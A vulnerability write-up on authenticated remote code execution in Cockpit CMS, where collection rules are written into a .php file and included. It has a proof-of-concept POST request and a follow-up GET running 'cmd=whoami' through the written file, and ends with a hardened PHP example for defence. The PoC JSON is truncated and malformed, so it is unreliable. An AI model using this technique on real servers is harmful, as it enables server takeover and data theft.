# Cockpit CMS Authenticated Remote Code Execution Vulnerability

## Vulnerability Overview

This is a design-level flaw rather than a standard logic error. The core of the vulnerability lies in Cockpit CMS allowing the definition of "collection rules", with the internal processing flow as follows:

1. **Input Reception**: The controller receives the user-supplied `rules` parameter.
2. **No Validation**: The code performs no validation, filtering, or restriction on the input content.
3. **File Writing**: The user input is written directly into a `.php` file.
4. **Code Execution**: The file is included and executed directly via the `include()` function.

**Core Logic Chain**: User Input -> Stored as PHP File -> Server Execution.

## Impact Scope

* **Full Remote Code Execution**: arbitrary PHP supplied by an authenticated user executes on the server.
* **Arbitrary Command Execution**: operating system commands can be run from the injected PHP (the PoC's `cmd=whoami` parameter shows this).
* **Complete Server Compromise**: the web server host is fully under the attacker's control.
* **Data Exfiltration**: any data the application can read may be leaked.
* **Privilege Escalation Possibilities**: the foothold can be used to attempt further privilege escalation on the host.

## Remediation

The original screenshot shows this section header but no specific remediation code. Typical remediation for this class of vulnerability:

* Validate the `rules` input against a strict whitelist.
* Never write user input directly into an executable (`.php`) file.
* Never `include()` a file whose contents come from untrusted input.
* Evaluate rules inside a sandboxing mechanism rather than as native PHP.

## Proof of Concept (POC)

**1. Malicious Request**

Modify the `save_collection` request in Burp Suite, injecting the payload into the JSON data:

```http
POST /cockpit/collections/save_collection HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=UTF-8
Cookie: rx_autologin=...; __xe_admin_gnb_tx_...
Content-Length: 902

{"collection":{"name":"test","label":"testlabel","color":"","fields":[],"acl":{"*":["collection_edit":true],"
```

**2. Execution Phase**

Execute commands using the written PHP file (e.g., `cmd=whoami`):

```http
http://localhost/cockpit/storage/collections/rules/test.read.php?cmd=whoami
```
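The following is an added example, not Cockpit CMS code and not from the original write-up. It shows the hardened counterpart of the flow described in the Vulnerability Overview and applies the points listed under Remediation: rules arrive as data, are checked against a whitelist of keys and value types, are stored as a JSON file rather than a `.php` file, and are loaded with `json_decode()` rather than `include()`. The file layout `<collection>.<action>.json` under `$rulesDir`, the rule vocabulary (`roles`, `limit`, `public`) and the function names are assumptions made for this example.

```php
<?php
declare(strict_types=1);

// Added example (not Cockpit CMS code). Hardened collection-rule storage:
// validate, store as JSON data, never write or include a .php file.
// Layout "<collection>.<action>.json" under $rulesDir is an assumption.

const ALLOWED_ACTIONS = ['read', 'create', 'update', 'delete'];

// Whitelist of rule keys and the gettype() result each value must have.
const ALLOWED_RULE_KEYS = [
    'roles'  => 'array',   // roles permitted to perform the action
    'limit'  => 'integer', // maximum number of records returned
    'public' => 'boolean', // whether anonymous access is permitted
];

function assertSafeName(string $name): string
{
    // Letters, digits, underscore and hyphen only: no dots, slashes or NUL bytes,
    // so the name can neither leave $rulesDir nor change the file extension.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        throw new InvalidArgumentException('invalid collection name');
    }
    return $name;
}

function validateRules(mixed $rules): array
{
    if (!is_array($rules)) {
        throw new InvalidArgumentException('rules must be a JSON object');
    }
    foreach ($rules as $key => $value) {
        if (!is_string($key) || !array_key_exists($key, ALLOWED_RULE_KEYS)) {
            throw new InvalidArgumentException('unknown rule key: ' . var_export($key, true));
        }
        if (gettype($value) !== ALLOWED_RULE_KEYS[$key]) {
            throw new InvalidArgumentException("wrong type for rule key: $key");
        }
    }
    foreach ($rules['roles'] ?? [] as $role) {
        if (!is_string($role)) {
            throw new InvalidArgumentException('roles must be strings');
        }
    }
    return $rules;
}

function rulesPath(string $rulesDir, string $collection, string $action): string
{
    if (!in_array($action, ALLOWED_ACTIONS, true)) {
        throw new InvalidArgumentException('invalid action');
    }
    return $rulesDir . '/' . assertSafeName($collection) . '.' . $action . '.json';
}

function saveRules(string $rulesDir, string $collection, string $action, mixed $rules): string
{
    $path = rulesPath($rulesDir, $collection, $action);
    $json = json_encode(validateRules($rules), JSON_THROW_ON_ERROR);
    // Plain data file: even if a value contains "<?php", nothing ever executes it.
    file_put_contents($path, $json, LOCK_EX);
    return $path;
}

function loadRules(string $rulesDir, string $collection, string $action): array
{
    $path = rulesPath($rulesDir, $collection, $action);
    $raw = file_get_contents($path);
    if ($raw === false) {
        throw new RuntimeException("no rules stored for $collection.$action");
    }
    // Decode and re-validate on the way in; the stored file is never include()d.
    return validateRules(json_decode($raw, true, 16, JSON_THROW_ON_ERROR));
}

function isAllowed(array $rules, ?string $userRole): bool
{
    if (($rules['public'] ?? false) === true) {
        return true;
    }
    return $userRole !== null && in_array($userRole, $rules['roles'] ?? [], true);
}

// Demo with constructed input. In real use $rulesDir must sit outside the web root.
$dir = sys_get_temp_dir() . '/rules-demo';
@mkdir($dir);

saveRules($dir, 'test', 'read', ['roles' => ['admin'], 'limit' => 50]);
var_dump(isAllowed(loadRules($dir, 'test', 'read'), 'admin'));
var_dump(isAllowed(loadRules($dir, 'test', 'read'), 'guest'));

// Rejected inputs: a path-traversing name and a rule key outside the whitelist.
$bad = [['../x', ['roles' => []]], ['test', ['code' => '<?php /* inert data */ ?>']]];
foreach ($bad as [$name, $rules]) {
    try {
        saveRules($dir, $name, 'read', $rules);
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

Run it with `php hardened-rules.php` (any file name). Two design choices matter here: the collection name whitelist has no dot, so a name can never produce a file like `test.read.php` as in the PoC, and the rules directory is data only, so even a value containing a PHP open tag is stored and returned as an inert string. Placing that directory outside the web root (or denying direct requests to it in the web server configuration) closes the second half of the PoC, the direct GET to the stored file.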